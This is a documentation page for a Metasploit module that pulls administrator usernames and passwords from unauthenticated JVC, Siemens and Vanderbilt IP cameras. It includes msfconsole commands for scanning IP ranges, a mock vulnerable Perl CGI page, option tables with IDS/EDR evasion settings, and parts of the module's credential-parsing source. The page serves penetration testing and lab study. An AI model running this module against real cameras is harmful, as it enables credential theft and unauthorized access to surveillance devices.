JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure - Metasploit


This page contains detailed information about how to use the auxiliary/gather/ipcamera_password_disclosure metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure
Module: auxiliary/gather/ipcamera_password_disclosure
Source code: modules/auxiliary/gather/ipcamera_password_disclosure.rb
Disclosure date: 2016-08-16
Last modification time: 2019-02-07 15:14:13 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -

SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU), and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allow an unauthenticated user to disclose the username & password by requesting the javascript page 'readfile.cgi?query=ADMINID'. Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


This module is a scanner module, and is capable of testing against multiple hosts.

msf > use auxiliary/gather/ipcamera_password_disclosure
msf auxiliary(ipcamera_password_disclosure) > show options
    ... show and set options ...
msf auxiliary(ipcamera_password_disclosure) > set RHOSTS ip-range
msf auxiliary(ipcamera_password_disclosure) > exploit

Other examples of setting the RHOSTS option:

Example 1:

msf auxiliary(ipcamera_password_disclosure) > set RHOSTS 192.168.1.3-192.168.1.200 

Example 2:

msf auxiliary(ipcamera_password_disclosure) > set RHOSTS 192.168.1.1/24

Example 3:

msf auxiliary(ipcamera_password_disclosure) > set RHOSTS file:/tmp/ip_list.txt

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Description


SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU), and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allow an unauthenticated user to disclose the username & password by requesting the javascript page 'readfile.cgi?query=ADMINID'. Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235

Vulnerable Application


This module has been verified against the mock vulnerable page listed below.

Mock Vulnerable Page

These instructions will create a cgi environment and a vulnerable perl application for exploitation. Kali rolling (2019.1) was utilized for this tutorial, with apache.

Setup


  1. Enable cgi: a2enmod cgid
  2. mkdir /var/www/html/cgi-bin
  3. Enable folder for cgi execution: add ScriptAlias "/cgi-bin/" "/var/www/html/cgi-bin/" to /etc/apache2/sites-enabled/000-default.conf inside of the VirtualHost tags
  4. Create the vulnerable page by writing the following text to /var/www/html/cgi-bin/readfile.cgi:
#!/usr/bin/perl
use CGI qw(:standard);
$query = new CGI;
print $query->header( -type=> "text/javascript"),
$query->import_names( 'Q' );
my $data = <<'DATA';
var Adm_ID="admin";
var Adm_Pass1="password";
var Language="en";
var Logoff_Time="0";
DATA
if ($Q::query == "ADMINID") {
  print $data;
}

Verification Steps


  1. Start msfconsole
  2. use auxiliary/gather/ipcamera_password_disclosure
  3. set rhosts [rhosts]
  4. run

Scenarios


Against the Mock page listed above

  msf5 > use auxiliary/gather/ipcamera_password_disclosure 
  msf5 auxiliary(gather/ipcamera_password_disclosure) > set rhosts 127.0.0.1
  rhosts => 127.0.0.1
  msf5 auxiliary(gather/ipcamera_password_disclosure) > run

  [+] Found: admin:password
  [*] Scanned 1 of 1 hosts (100% complete)
  [*] Auxiliary module execution completed

Go back to menu.

Msfconsole Usage


Here is how the gather/ipcamera_password_disclosure auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/ipcamera_password_disclosure

msf6 auxiliary(gather/ipcamera_password_disclosure) > show info

       Name: JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure
     Module: auxiliary/gather/ipcamera_password_disclosure
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2016-08-16

Provided by:
  Yakir Wizman
  h00die

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80               yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                no        URL of the IP-Camera root
  THREADS    1                yes       The number of concurrent threads (max one per host)
  VHOST                       no        HTTP server virtual host

Description:
  SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera 
  (VN-T216VPRU), and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) 
  allow an unauthenticated user to disclose the username & password by 
  requesting the javascript page 'readfile.cgi?query=ADMINID'. Siemens 
  firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, 
  x.2.2.1235

References:
  https://www.exploit-db.com/exploits/40254
  https://www.exploit-db.com/exploits/40263
  https://www.exploit-db.com/exploits/40264

Module Options


This is a complete list of options available in the gather/ipcamera_password_disclosure auxiliary module:

msf6 auxiliary(gather/ipcamera_password_disclosure) > show options

Module options (auxiliary/gather/ipcamera_password_disclosure):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                no        URL of the IP-Camera root
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host

Advanced Options


Here is a complete list of advanced options supported by the gather/ipcamera_password_disclosure auxiliary module:

msf6 auxiliary(gather/ipcamera_password_disclosure) > show advanced

Module advanced options (auxiliary/gather/ipcamera_password_disclosure):

   Name                  Current Setting                                     Required  Description
   ----                  ---------------                                     --------  -----------
   DOMAIN                WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS         true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   FingerprintCheck      true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                         no        HTTP connection and receive timeout
   HttpPassword                                                              no        The HTTP password to specify for authentication
   HttpRawHeaders                                                            no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace             false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors       red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly  false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                              no        The HTTP username to specify for authentication
   SSLVersion            Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   ShowProgress          true                                                yes       Display progress messages during a scan
   ShowProgressPercent   10                                                  yes       The interval in percent that progress should be shown
   UserAgent             Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE               false                                               no        Enable detailed status messages
   WORKSPACE                                                                 no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the gather/ipcamera_password_disclosure module can do:

msf6 auxiliary(gather/ipcamera_password_disclosure) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/ipcamera_password_disclosure auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/ipcamera_password_disclosure) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<PEER> Unable to connect to <URL>


Here is a relevant code snippet related to the "<PEER> Unable to connect to <URL>" error message:

45:	      res = send_request_cgi({
46:	        'uri'      => url,
47:	        'vars_get' => {'query'=>'ADMINID'}
48:	      })
49:	      unless res
50:	        print_error("#{peer} Unable to connect to #{url}")
51:	        return
52:	      end
53:	
54:	      unless res.body.include?('Adm_ID=')
55:	        print_error("Invalid response received for #{peer} for #{url}")

Invalid response received for <PEER> for <URL>


Here is a relevant code snippet related to the "Invalid response received for <PEER> for <URL>" error message:

50:	        print_error("#{peer} Unable to connect to #{url}")
51:	        return
52:	      end
53:	
54:	      unless res.body.include?('Adm_ID=')
55:	        print_error("Invalid response received for #{peer} for #{url}")
56:	        return
57:	      end
58:	
59:	      if res.body =~ /var Adm_ID="(.+?)";\s+var Adm_Pass1="(.+?)";/
60:	        print_good("Found: #{$1}:#{$2}")

<PEER> Unable to connect to site


Here is a relevant code snippet related to the "<PEER> Unable to connect to site" error message:

62:	          user:         $1,
63:	          private:      $2,
64:	          private_type: :password
65:	        )
66:	      end
67:	    rescue ::Rex::ConnectionError
68:	      print_error("#{peer} Unable to connect to site")
69:	      return
70:	    end
71:	  end
72:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Yakir Wizman
  • h00die

Version


This page has been produced using Metasploit Framework version 6.2.26-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.